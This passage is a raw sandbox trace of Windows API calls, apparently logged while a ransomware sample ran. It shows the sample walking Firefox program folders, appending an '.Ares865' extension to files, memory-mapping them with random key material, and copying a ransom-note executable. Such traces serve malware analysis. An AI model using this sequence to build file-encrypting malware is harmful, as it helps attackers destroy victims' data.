szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0125.916] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0125.916] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0125.918] lstrcpyW (in: lpString1=0x2cce466, lpString2="Uninstall.exe" | out: lpString1="Uninstall.exe") returned="Uninstall.exe" [0125.918] lstrlenW (lpString="Uninstall.exe") returned 13 [0125.919] lstrlenW (lpString="Ares865") returned 7 [0125.919] lstrcmpiW (lpString1="all.exe", lpString2="Ares865") returned -1 [0125.919] lstrlenW (lpString=".dll") returned 4 [0125.919] lstrcmpiW (lpString1="Uninstall.exe", lpString2=".dll") returned 1 [0125.919] lstrlenW (lpString=".lnk") returned 4 [0125.919] lstrcmpiW (lpString1="Uninstall.exe", lpString2=".lnk") returned 1 [0125.919] lstrlenW (lpString=".ini") returned 4 [0125.919] lstrcmpiW (lpString1="Uninstall.exe", lpString2=".ini") returned 1 [0125.919] lstrlenW (lpString=".sys") returned 4 [0125.919] lstrcmpiW (lpString1="Uninstall.exe", lpString2=".sys") returned 1 [0125.919] lstrlenW (lpString="Uninstall.exe") returned 13 [0125.919] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Mozilla Maintenance Service\\Uninstall.exe.Ares865") returned 72 [0125.919] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Mozilla Maintenance Service\\Uninstall.exe" (normalized: "c:\\program files (x86)\\mozilla maintenance service\\uninstall.exe"), lpNewFileName="C:\\Program Files (x86)\\Mozilla Maintenance Service\\Uninstall.exe.Ares865" (normalized: "c:\\program files (x86)\\mozilla maintenance service\\uninstall.exe.ares865"), dwFlags=0x1) returned 1 [0125.921] CreateFileW (lpFileName="C:\\Program Files (x86)\\Mozilla Maintenance Service\\Uninstall.exe.Ares865" (normalized: "c:\\program files (x86)\\mozilla maintenance service\\uninstall.exe.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0125.921] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=106212) returned 1 [0125.922] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0125.922] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0125.922] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0125.923] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x1a1f0, lpName=0x0) returned 0x170 [0125.935] MapViewOfFile (hFileMappingObject=0x170, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x1a1f0) returned 0x190000 [0125.947] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0125.948] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0125.948] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0125.950] lstrcpyW (in: lpString1=0x2cce466, lpString2="updater.ini" | out: lpString1="updater.ini") returned="updater.ini" [0125.950] lstrlenW (lpString="updater.ini") returned 11 [0125.950] lstrlenW (lpString="Ares865") returned 7 [0125.950] lstrcmpiW (lpString1="ter.ini", lpString2="Ares865") returned 1 [0125.950] lstrlenW (lpString=".dll") returned 4 [0125.950] lstrcmpiW (lpString1="updater.ini", lpString2=".dll") returned 1 [0125.950] lstrlenW (lpString=".lnk") returned 4 [0125.950] lstrcmpiW (lpString1="updater.ini", lpString2=".lnk") returned 1 [0125.950] lstrlenW (lpString=".ini") returned 4 [0125.950] lstrcmpiW (lpString1="updater.ini", lpString2=".ini") returned 1 [0125.950] lstrlenW (lpString=".sys") returned 4 [0125.950] lstrcmpiW (lpString1="updater.ini", lpString2=".sys") returned 1 [0125.950] lstrlenW (lpString="updater.ini") returned 11 [0125.950] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Mozilla Maintenance Service\\updater.ini.Ares865") returned 70 [0125.950] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Mozilla Maintenance Service\\updater.ini" (normalized: "c:\\program files (x86)\\mozilla maintenance service\\updater.ini"), lpNewFileName="C:\\Program Files (x86)\\Mozilla Maintenance Service\\updater.ini.Ares865" (normalized: "c:\\program files (x86)\\mozilla maintenance service\\updater.ini.ares865"), dwFlags=0x1) returned 1 [0125.953] CreateFileW (lpFileName="C:\\Program Files (x86)\\Mozilla Maintenance Service\\updater.ini.Ares865" (normalized: "c:\\program files (x86)\\mozilla maintenance service\\updater.ini.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0125.954] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=1245) returned 1 [0125.954] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0125.955] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0125.955] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0125.955] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x7e0, lpName=0x0) returned 0x170 [0125.956] MapViewOfFile (hFileMappingObject=0x170, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x7e0) returned 0x190000 [0125.958] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0125.959] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0125.959] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0125.960] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Program Files (x86)\\Mozilla Firefox", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Mozilla Firefox") returned="C:\\Program Files (x86)\\Mozilla Firefox" [0125.960] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Mozilla Firefox" | out: lpString1="C:\\Program Files (x86)\\Mozilla Firefox") returned="C:\\Program Files (x86)\\Mozilla Firefox" [0125.960] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0125.960] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Mozilla Firefox\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\mozilla firefox\\how to back your files.exe"), bFailIfExists=1) returned 0 [0125.961] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0125.962] GetLastError () returned 0x0 [0125.963] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0125.963] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Mozilla Firefox\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xaeef6000, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0x523a39e0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x523a39e0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccf68 [0125.963] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0125.963] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0125.963] lstrcpyW (in: lpString1=0x2cce44e, lpString2="AccessibleMarshal.dll" | out: lpString1="AccessibleMarshal.dll") returned="AccessibleMarshal.dll" [0125.963] lstrlenW (lpString="AccessibleMarshal.dll") returned 21 [0125.963] lstrlenW (lpString="Ares865") returned 7 [0125.963] lstrcmpiW (lpString1="hal.dll", lpString2="Ares865") returned 1 [0125.963] lstrlenW (lpString=".dll") returned 4 [0125.963] lstrcmpiW (lpString1="AccessibleMarshal.dll", lpString2=".dll") returned 1 [0125.964] lstrlenW (lpString=".lnk") returned 4 [0125.964] lstrcmpiW (lpString1="AccessibleMarshal.dll", lpString2=".lnk") returned 1 [0125.964] lstrlenW (lpString=".ini") returned 4 [0125.964] lstrcmpiW (lpString1="AccessibleMarshal.dll", lpString2=".ini") returned 1 [0125.964] lstrlenW (lpString=".sys") returned 4 [0125.964] lstrcmpiW (lpString1="AccessibleMarshal.dll", lpString2=".sys") returned 1 [0125.964] lstrlenW (lpString="AccessibleMarshal.dll") returned 21 [0125.964] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Mozilla Firefox\\AccessibleMarshal.dll.Ares865") returned 68 [0125.964] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Mozilla Firefox\\AccessibleMarshal.dll" (normalized: "c:\\program files (x86)\\mozilla firefox\\accessiblemarshal.dll"), lpNewFileName="C:\\Program Files (x86)\\Mozilla Firefox\\AccessibleMarshal.dll.Ares865" (normalized: "c:\\program files (x86)\\mozilla firefox\\accessiblemarshal.dll.ares865"), dwFlags=0x1) returned 1 [0125.966] CreateFileW (lpFileName="C:\\Program Files (x86)\\Mozilla Firefox\\AccessibleMarshal.dll.Ares865" (normalized: "c:\\program files (x86)\\mozilla firefox\\accessiblemarshal.dll.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0125.966] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=20080) returned 1 [0125.966] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0125.967] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0125.967] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0125.967] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x5170, lpName=0x0) returned 0x170 [0125.969] MapViewOfFile (hFileMappingObject=0x170, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x5170) returned 0x190000 [0125.971] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0125.972] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0125.972] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0125.972] lstrcpyW (in: lpString1=0x2cce44e, lpString2="application.ini" | out: lpString1="application.ini") returned="application.ini" [0125.972] lstrlenW (lpString="application.ini") returned 15 [0125.973] lstrlenW (lpString="Ares865") returned 7 [0125.973] lstrcmpiW (lpString1="ion.ini", lpString2="Ares865") returned 1 [0125.973] lstrlenW (lpString=".dll") returned 4 [0125.973] lstrcmpiW (lpString1="application.ini", lpString2=".dll") returned 1 [0125.973] lstrlenW (lpString=".lnk") returned 4 [0125.973] lstrcmpiW (lpString1="application.ini", lpString2=".lnk") returned 1 [0125.973] lstrlenW (lpString=".ini") returned 4 [0125.973] lstrcmpiW (lpString1="application.ini", lpString2=".ini") returned 1 [0125.973] lstrlenW (lpString=".sys") returned 4 [0125.973] lstrcmpiW (lpString1="application.ini", lpString2=".sys") returned 1 [0125.973] lstrlenW (lpString="application.ini") returned 15 [0125.973] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Mozilla Firefox\\application.ini.Ares865") returned 62 [0125.973] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Mozilla Firefox\\application.ini" (normalized: "c:\\program files (x86)\\mozilla firefox\\application.ini"), lpNewFileName="C:\\Program Files (x86)\\Mozilla Firefox\\application.ini.Ares865" (normalized: "c:\\program files (x86)\\mozilla firefox\\application.ini.ares865"), dwFlags=0x1) returned 1 [0125.975] CreateFileW (lpFileName="C:\\Program Files (x86)\\Mozilla Firefox\\application.ini.Ares865" (normalized: "c:\\program files (x86)\\mozilla firefox\\application.ini.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0125.975] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=633) returned 1 [0125.975] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0125.976] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0125.976] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0125.977] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x580, lpName=0x0) returned 0x170 [0125.978] MapViewOfFile (hFileMappingObject=0x170, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x580) returned 0x190000 [0125.979] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0125.979] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0125.979] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0125.980] lstrcpyW (in: lpString1=0x2cce44e, lpString2="breakpadinjector.dll" | out: lpString1="breakpadinjector.dll") returned="breakpadinjector.dll" [0125.980] lstrlenW (lpString="breakpadinjector.dll") returned 20 [0125.980] lstrlenW (lpString="Ares865") returned 7 [0125.980] lstrcmpiW (lpString1="tor.dll", lpString2="Ares865") returned 1 [0125.980] lstrlenW (lpString=".dll") returned 4 [0125.980] lstrcmpiW (lpString1="breakpadinjector.dll", lpString2=".dll") returned 1 [0125.980] lstrlenW (lpString=".lnk") returned 4 [0125.980] lstrcmpiW (lpString1="breakpadinjector.dll", lpString2=".lnk") returned 1 [0125.980] lstrlenW (lpString=".ini") returned 4 [0125.980] lstrcmpiW (lpString1="breakpadinjector.dll", lpString2=".ini") returned 1 [0125.980] lstrlenW (lpString=".sys") returned 4 [0125.980] lstrcmpiW (lpString1="breakpadinjector.dll", lpString2=".sys") returned 1 [0125.980] lstrlenW (lpString="breakpadinjector.dll") returned 20 [0125.981] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Mozilla Firefox\\breakpadinjector.dll.Ares865") returned 67 [0125.981] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Mozilla Firefox\\breakpadinjector.dll" (normalized: "c:\\program files (x86)\\mozilla firefox\\breakpadinjector.dll"), lpNewFileName="C:\\Program Files (x86)\\Mozilla Firefox\\breakpadinjector.dll.Ares865" (normalized: "c:\\program files (x86)\\mozilla firefox\\breakpadinjector.dll.ares865"), dwFlags=0x1) returned 1 [0125.982] CreateFileW (lpFileName="C:\\Program Files (x86)\\Mozilla Firefox\\breakpadinjector.dll.Ares865" (normalized: "c:\\program files (x86)\\mozilla firefox\\breakpadinjector.dll.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0125.982] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=75376) returned 1 [0125.983] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0125.983] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0125.983] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0125.984] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x12970, lpName=0x0) returned 0x170 [0125.985] MapViewOfFile (hFileMappingObject=0x170, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x12970) returned 0x190000 [0125.990] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0125.990] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0125.991] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0125.992] lstrcpyW (in: lpString1=0x2cce44e, lpString2="browser" | out: lpString1="browser") returned="browser" [0125.992] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7ba8 [0125.992] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x5e) returned 0x2f1fc8 [0125.992] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7bb0 | out: ListHead=0x2e7710, ListEntry=0x2e7bb0) returned 0x2e79d0 [0125.992] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaef8e580, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xaef8e580, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0x24ca9180, ftLastWriteTime.dwHighDateTime=0x1ced1ee, nFileSizeHigh=0x0, nFileSizeLow=0x1ca70, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="crashreporter.exe", cAlternateFileName="CRASHR~1.EXE")) returned 1 [0125.992] lstrcmpiW (lpString1="crashreporter.exe", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0125.992] lstrcmpiW (lpString1="crashreporter.exe", lpString2="aoldtz.exe") returned 1 [0125.992] lstrcpyW (in: lpString1=0x2cce44e, lpString2="crashreporter.exe" | out: lpString1="crashreporter.exe") returned="crashreporter.exe" [0125.992] lstrlenW (lpString="crashreporter.exe") returned 17 [0125.993] lstrlenW (lpString="Ares865") returned 7 [0125.993] lstrcmpiW (lpString1="ter.exe", lpString2="Ares865") returned 1 [0125.993] lstrlenW (lpString=".dll") returned 4 [0125.993] lstrcmpiW (lpString1="crashreporter.exe", lpString2=".dll") returned 1 [0125.993] lstrlenW (lpString=".lnk") returned 4 [0125.993] lstrcmpiW (lpString1="crashreporter.exe", lpString2=".lnk") returned 1 [0125.993] lstrlenW (lpString=".ini") returned 4 [0125.993] lstrcmpiW (lpString1="crashreporter.exe", lpString2=".ini") returned 1 [0125.993] lstrlenW (lpString=".sys") returned 4 [0125.993] lstrcmpiW (lpString1="crashreporter.exe", lpString2=".sys") returned 1 [0125.993] lstrlenW (lpString="crashreporter.exe") returned 17 [0125.993] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Mozilla Firefox\\crashreporter.exe.Ares865") returned 64 [0125.993] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Mozilla Firefox\\crashreporter.exe" (normalized: "c:\\program files (x86)\\mozilla firefox\\crashreporter.exe"), lpNewFileName="C:\\Program Files (x86)\\Mozilla Firefox\\crashreporter.exe.Ares865" (normalized: "c:\\program files (x86)\\mozilla firefox\\crashreporter.exe.ares865"), dwFlags=0x1) returned 1 [0125.995] CreateFileW (lpFileName="C:\\Program Files (x86)\\Mozilla Firefox\\crashreporter.exe.Ares865" (normalized: "c:\\program files (x86)\\mozilla firefox\\crashreporter.exe.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0125.995] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=117360) returned 1 [0125.995] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0125.996] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0125.996] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0125.996] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x1cd70, lpName=0x0) returned 0x170 [0125.998] MapViewOfFile (hFileMappingObject=0x170, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x1cd70) returned 0x190000 [0126.003] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0126.004] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0126.004] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0126.006] lstrcpyW (in: lpString1=0x2cce44e, lpString2="crashreporter.ini" | out: lpString1="crashreporter.ini") returned="crashreporter.ini" [0126.006] lstrlenW (lpString="crashreporter.ini") returned 17 [0126.006] lstrlenW (lpString="Ares865") returned 7 [0126.006] lstrcmpiW (lpString1="ter.ini", lpString2="Ares865") returned 1 [0126.006] lstrlenW (lpString=".dll") returned 4 [0126.006] lstrcmpiW (lpString1="crashreporter.ini", lpString2=".dll") returned 1 [0126.006] lstrlenW (lpString=".lnk") returned 4 [0126.006] lstrcmpiW (lpString1="crashreporter.ini", lpString2=".lnk") returned 1 [0126.006] lstrlenW (lpString=".ini") returned 4 [0126.006] lstrcmpiW (lpString1="crashreporter.ini", lpString2=".ini") returned 1 [0126.006] lstrlenW (lpString=".sys") returned 4 [0126.006] lstrcmpiW (lpString1="crashreporter.ini", lpString2=".sys") returned 1 [0126.006] lstrlenW (lpString="crashreporter.ini") returned 17 [0126.007] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Mozilla Firefox\\crashreporter.ini.Ares865") returned 64 [0126.007] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Mozilla Firefox\\crashreporter.ini" (normalized: "c:\\program files (x86)\\mozilla firefox\\crashreporter.ini"), lpNewFileName="C:\\Program Files (x86)\\Mozilla Firefox\\crashreporter.ini.Ares865" (normalized: "c:\\program files (x86)\\mozilla firefox\\crashreporter.ini.ares865"), dwFlags=0x1) returned 1 [0126.009] CreateFileW (lpFileName="C:\\Program Files (x86)\\Mozilla Firefox\\crashreporter.ini.Ares865" (normalized: "c:\\program files (x86)\\mozilla firefox\\crashreporter.ini.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0126.009] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=4003) returned 1 [0126.009] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0126.010] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0126.010] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0126.010] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x12b0, lpName=0x0) returned 0x170 [0126.011] MapViewOfFile (hFileMappingObject=0x170, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x12b0) returned 0x190000 [0126.012] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0126.013] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0126.013] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0126.014] lstrcpyW (in: lpString1=0x2cce44e, lpString2="D3DCompiler_43.dll" | out: lpString1="D3DCompiler_43.dll") returned="D3DCompiler_43.dll" [0126.014] lstrlenW (lpString="D3DCompiler_43.dll") returned 18 [0126.014] lstrlenW (lpString="Ares865") returned 7 [0126.014] lstrcmpiW (lpString1="_43.dll", lpString2="Ares865") returned -1 [0126.014] lstrlenW (lpString=".dll") returned 4 [0126.014] lstrcmpiW (lpString1="D3DCompiler_43.dll", lpString2=".dll") returned 1 [0126.014] lstrlenW (lpString=".lnk") returned 4 [0126.014] lstrcmpiW (lpString1="D3DCompiler_43.dll", lpString2=".lnk") returned 1 [0126.014] lstrlenW (lpString=".ini") returned 4 [0126.014] lstrcmpiW (lpString1="D3DCompiler_43.dll", lpString2=".ini") returned 1 [0126.014] lstrlenW (lpString=".sys") returned 4 [0126.014] lstrcmpiW (lpString1="D3DCompiler_43.dll", lpString2=".sys") returned 1 [0126.014] lstrlenW (lpString="D3DCompiler_43.dll") returned 18 [0126.015] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Mozilla Firefox\\D3DCompiler_43.dll.Ares865") returned 65 [0126.015] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Mozilla Firefox\\D3DCompiler_43.dll" (normalized: "c:\\program files (x86)\\mozilla firefox\\d3dcompiler_43.dll"), lpNewFileName="C:\\Program Files (x86)\\Mozilla Firefox\\D3DCompiler_43.dll.Ares865" (normalized: "c:\\program files (x86)\\mozilla firefox\\d3dcompiler_43.dll.ares865"), dwFlags=0x1) returned 1 [0126.016] CreateFileW (lpFileName="C:\\Program Files (x86)\\Mozilla Firefox\\D3DCompiler_43.dll.Ares865" (normalized: "c:\\program files (x86)\\mozilla firefox\\d3dcompiler_43.dll.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0126.016] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=2106216) returned 1 [0126.017] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0126.017] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0126.017] CryptReleaseContext (hProv=0x2f0518, 